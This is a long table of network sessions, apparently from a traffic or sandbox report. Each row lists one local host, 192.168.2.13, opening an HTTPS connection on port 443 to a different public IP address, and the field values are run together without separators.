                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12407192.168.2.134986442.6.188.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12408192.168.2.1334094110.157.163.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12409192.168.2.134913017.50.136.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12410192.168.2.1359022100.167.149.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12411192.168.2.1355566189.40.200.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12412192.168.2.1346210152.155.32.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12413192.168.2.1350052102.160.132.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12414192.168.2.136017885.3.96.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12415192.168.2.1345834222.180.81.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12416192.168.2.1354914188.211.146.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12417192.168.2.1334988141.84.80.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12418192.168.2.135567479.234.106.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12419192.168.2.134128068.14.233.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12420192.168.2.1339190181.122.171.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12421192.168.2.135867848.131.187.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12422192.168.2.1359776123.143.163.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12423192.168.2.1350378181.49.128.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12424192.168.2.13572622.122.60.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12425192.168.2.1340334130.148.1.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12426192.168.2.135311095.233.169.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12427192.168.2.133338488.159.171.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12428192.168.2.1347390120.239.183.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12429192.168.2.1356758163.38.231.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12430192.168.2.1341446202.43.76.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12431192.168.2.1343700124.218.247.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12432192.168.2.1352524129.158.135.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12433192.168.2.1341922102.200.92.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12434192.168.2.134703466.76.138.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12435192.168.2.1342708208.181.17.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12436192.168.2.1334448115.202.94.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12437192.168.2.1352354163.238.42.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12438192.168.2.135984840.71.140.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12439192.168.2.133564448.95.124.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12440192.168.2.1350534105.83.152.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12441192.168.2.134979418.197.181.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12442192.168.2.1333024203.90.99.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12443192.168.2.1341382218.195.46.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12444192.168.2.1344550111.133.69.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12445192.168.2.1336676123.197.90.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12446192.168.2.1353086159.212.56.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12447192.168.2.1338982223.216.163.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12448192.168.2.1350696201.126.12.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12449192.168.2.1338102194.225.126.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12450192.168.2.134244847.144.198.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12451192.168.2.1353540213.6.41.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12452192.168.2.1350882148.154.197.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12453192.168.2.1335024213.245.124.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12454192.168.2.133539089.151.156.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12455192.168.2.134006280.54.145.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12456192.168.2.135906488.8.113.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12457192.168.2.1343920190.144.151.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12458192.168.2.1355168183.6.188.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12459192.168.2.134089682.25.218.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12460192.168.2.1336208169.58.104.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12461192.168.2.1353246148.225.70.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12462192.168.2.1338428105.37.242.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12463192.168.2.135324496.2.36.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12464192.168.2.133350687.170.130.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12465192.168.2.1353278135.212.38.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12466192.168.2.1338234143.56.248.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12467192.168.2.1356022201.59.248.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12468192.168.2.1357226176.130.124.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12469192.168.2.1345342107.43.63.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12470192.168.2.135373282.87.74.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12471192.168.2.1356160160.132.204.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12472192.168.2.1357440144.195.18.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12473192.168.2.1348106205.145.71.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12474192.168.2.1338852140.179.101.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12475192.168.2.1341768126.90.240.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12476192.168.2.133717827.94.68.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12477192.168.2.1346764191.222.93.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12478192.168.2.133884277.91.96.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12479192.168.2.134564663.100.53.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12480192.168.2.1333908221.118.142.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12481192.168.2.1359658158.140.112.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12482192.168.2.1337164161.169.171.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12483192.168.2.1350130113.179.74.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12484192.168.2.1338936139.100.38.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12485192.168.2.1353844177.235.11.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12486192.168.2.1346378100.57.213.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12487192.168.2.1341860104.208.175.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12488192.168.2.1354500154.97.213.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12489192.168.2.1348218206.143.217.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12490192.168.2.1360830118.164.22.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12491192.168.2.1354138193.166.237.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12492192.168.2.135061282.114.170.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12493192.168.2.135269670.48.221.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12494192.168.2.1341368154.108.2.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12495192.168.2.134913654.216.150.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12496192.168.2.1350412104.57.192.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12497192.168.2.1350594190.72.117.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12498192.168.2.1335302111.140.210.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12499192.168.2.135293420.103.222.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12500192.168.2.1339074169.211.53.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12501192.168.2.1338452179.106.198.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12502192.168.2.13374309.38.88.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12503192.168.2.1340140101.219.77.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12504192.168.2.134626213.141.180.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12505192.168.2.133401464.35.223.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12506192.168.2.1360640192.54.245.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12507192.168.2.1343896158.232.81.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12508192.168.2.1337390100.201.126.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12509192.168.2.1344836188.147.61.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12510192.168.2.1359814186.138.94.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12511192.168.2.1346912212.16.187.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12512192.168.2.1345848108.10.237.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12513192.168.2.1360636209.52.236.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12514192.168.2.1352252193.46.251.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12515192.168.2.1347846220.28.143.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12516192.168.2.133732813.170.24.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12517192.168.2.1358846161.144.242.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12518192.168.2.1358468184.103.201.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12519192.168.2.13454242.120.154.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12520192.168.2.134447019.221.109.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12521192.168.2.1342264217.41.131.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12522192.168.2.134172672.74.214.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12523192.168.2.134837438.231.17.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12524192.168.2.134301019.19.53.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12525192.168.2.1343194196.161.235.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12526192.168.2.1346156105.100.185.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12527192.168.2.1352764120.222.35.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12528192.168.2.134775042.125.176.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12529192.168.2.1343902146.186.191.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12530192.168.2.134920664.46.199.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12531192.168.2.1360356167.52.61.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12532192.168.2.1356206185.114.138.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12533192.168.2.133777427.107.212.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12534192.168.2.1340694142.250.161.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12535192.168.2.1350342134.255.153.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12536192.168.2.1338250154.142.74.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12537192.168.2.1345392146.189.90.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12538192.168.2.135839434.187.31.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12539192.168.2.134125883.22.42.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12540192.168.2.1348734192.109.38.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12541192.168.2.135159439.25.143.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12542192.168.2.133481039.132.140.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12543192.168.2.1335432203.16.232.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12544192.168.2.134697093.48.214.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12545192.168.2.135064845.236.201.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12546192.168.2.1352008222.105.141.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12547192.168.2.134291614.33.254.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12548192.168.2.1343768145.19.211.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12549192.168.2.1333274106.111.46.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12550192.168.2.1335542102.49.142.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12551192.168.2.134592012.218.174.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12552192.168.2.134776637.180.145.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12553192.168.2.1341808220.188.27.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12554192.168.2.1358500153.106.62.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12555192.168.2.1340358144.59.44.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12556192.168.2.136000042.120.189.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12557192.168.2.1345418189.116.226.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12558192.168.2.134237672.74.107.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12559192.168.2.135573695.159.172.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12560192.168.2.1339556199.182.206.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12561192.168.2.1340298183.125.233.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12562192.168.2.135812099.236.206.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12563192.168.2.1348522205.110.117.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12564192.168.2.1354538153.160.217.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12565192.168.2.1336940148.97.123.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12566192.168.2.134992098.231.31.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12567192.168.2.1340920112.20.239.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12568192.168.2.1352794201.170.62.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12569192.168.2.1360166154.112.14.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12570192.168.2.1352756155.44.77.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12571192.168.2.133455438.98.181.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12572192.168.2.1347766175.127.177.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12573192.168.2.1357820204.238.111.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12574192.168.2.1350036122.84.90.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12575192.168.2.1351506182.230.215.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12576192.168.2.133336286.82.254.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12577192.168.2.1355802142.225.85.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12578192.168.2.135047684.19.103.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12579192.168.2.133692273.129.248.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12580192.168.2.134458077.16.236.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12581192.168.2.13586668.174.28.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12582192.168.2.133728653.104.121.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12583192.168.2.135905296.202.130.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12584192.168.2.1336046108.66.91.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12585192.168.2.135226634.103.26.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12586192.168.2.135272287.205.143.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12587192.168.2.134248648.112.158.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12588192.168.2.133848859.71.253.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12589192.168.2.1360658147.209.211.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12590192.168.2.1345862187.233.55.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12591192.168.2.1357234145.32.197.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12592192.168.2.1342648140.130.166.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12593192.168.2.13389109.52.220.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12594192.168.2.133453257.64.201.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12595192.168.2.1344906223.84.40.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12596192.168.2.133410471.77.36.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12597192.168.2.135992886.15.205.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12598192.168.2.1339174152.213.175.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12599192.168.2.1336540206.23.163.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12600192.168.2.13440389.206.210.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12601192.168.2.1340864151.246.82.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12602192.168.2.134326890.201.139.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12603192.168.2.134527254.161.250.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12604192.168.2.1351536174.146.224.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12605192.168.2.1360316117.102.60.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12606192.168.2.133407886.152.32.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12607192.168.2.136055694.148.221.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12608192.168.2.1341084142.189.34.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12609192.168.2.1335836139.53.228.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12610192.168.2.134039442.56.116.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12611192.168.2.133736051.217.91.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12612192.168.2.135994854.34.225.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12613192.168.2.1347652106.148.254.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12614192.168.2.1337134101.147.228.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12615192.168.2.1340940195.175.150.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12616192.168.2.1340854164.133.37.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12617192.168.2.1347162120.25.22.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12618192.168.2.134344475.202.161.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12619192.168.2.1336668119.66.51.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12620192.168.2.13345964.81.255.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12621192.168.2.135164459.77.248.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12622192.168.2.1336204210.10.28.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12623192.168.2.1350400137.90.86.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12624192.168.2.1338454136.186.94.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12625192.168.2.1349356198.180.199.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12626192.168.2.1341612138.199.183.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12627192.168.2.13385864.156.59.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
